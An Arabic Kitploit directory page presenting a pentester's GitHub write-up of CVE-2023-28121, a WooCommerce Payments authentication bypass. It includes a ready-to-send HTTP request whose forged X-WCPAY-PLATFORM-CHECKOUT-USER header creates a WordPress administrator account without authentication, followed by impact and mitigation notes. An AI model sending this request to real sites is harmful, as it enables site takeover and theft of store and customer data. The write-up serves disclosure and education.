Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-28121-WordPress-Privilege-Escalation — استغلال عملي لثغرة أمنية حرجة في ووردبريس باستخدام إضافة WooCommerce Payments. | Kitploit
أدوات/GitHubGitHub/luisdevpentest/cve-2023-28121-wordpress-privilege-escalation
المصادقة والترخيصتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubluisdevpentest/cve-2023-28121-wordpress-privilege-escalation

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-28121-WordPress-Privilege-Escalation

استغلال عملي لثغرة أمنية حرجة في ووردبريس باستخدام إضافة WooCommerce Payments.

عرض المستودع
1منذ 3 أشهرلم تتم المراجعة بعد

🔐 CVE-2023-28121 — تصعيد الصلاحيات في ووردبريس

استغلال عملي لثغرة حرجة في ووردبريس باستخدام إضافة WooCommerce Payments.


📌 ملخص

تسمح CVE-2023-28121 بإنشاء مستخدمين مسؤولين دون مصادقة عبر REST API.

  • الخطورة: حرجة (CVSS 9.8)
  • التأثير: السيطرة الكاملة على الموقع
  • النوع: تجاوز المصادقة / تصعيد الصلاحيات
  • +600.000 تثبيت نشط - مارس 2023 https://www.wiz.io/vulnerability-database/cve/cve-2023-28121?utm_source=chatgpt.com

📊 تمتلك الإضافة المتأثرة مئات الآلاف من التثبيتات، وتُستخدم على نطاق واسع في المتاجر الإلكترونية.


🎥 عرض توضيحي

https://github.com/user-attachments/assets/cead3884-0924-4320-967f-de9fb3f6cd44


⚠️ كيف يعمل

يقبل النظام عنوانًا يمكن التلاعب به:

root@kitploit:~
X-WCPAY-PLATFORM-CHECKOUT-USER: 1

وبذلك، يمكن إرسال طلب لإنشاء مستخدم بصلاحيات مرتفعة دون مصادقة صالحة.


🧪 إثبات المفهوم (PoC)

root@kitploit:~
POST /wp-json/wp/v2/users
Content-Type: application/json
X-WCPAY-PLATFORM-CHECKOUT-USER: 1

{
  "username": "hacked",
  "password": "StrongPass123!",
  "email": "[email protected]",
  "roles": ["administrator"]
}

✔️ النتيجة: إنشاء مستخدم مسؤول


🔥 التأثير

  • إنشاء مسؤول
  • الوصول إلى لوحة التحكم /wp-admin
  • احتمالية السيطرة الكاملة
  • خطر الاحتيال وتسريب البيانات

🛠️ التخفيف

  • تحديث الإضافة إلى الإصدار المُصحَّح
  • تقييد الوصول إلى REST API
  • التحقق الصحيح من المصادقة

🧱 البيئة

  • ووردبريس (بيئة محلية)
  • WooCommerce Payments (إصدار ضعيف)

📚 المراجع

  • CVE-2023-28121
  • وثائق REST API الخاصة بووردبريس
  • https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/

👨‍💻 المؤلف

Luis Eduardo .M.B.S.R

Pentester / أمان الويب

LinkedIn: https://www.linkedin.com/in/luis-eduardo-ti/

GitHub: https://github.com/luisdevpentest

⚖️ إخلاء مسؤولية

استخدام تعليمي في بيئة خاضعة للرقابة. لا أتحمل مسؤولية كيفية استخدام هذه المعرفة من قبل أطراف ثالثة.

تنزيل الأداة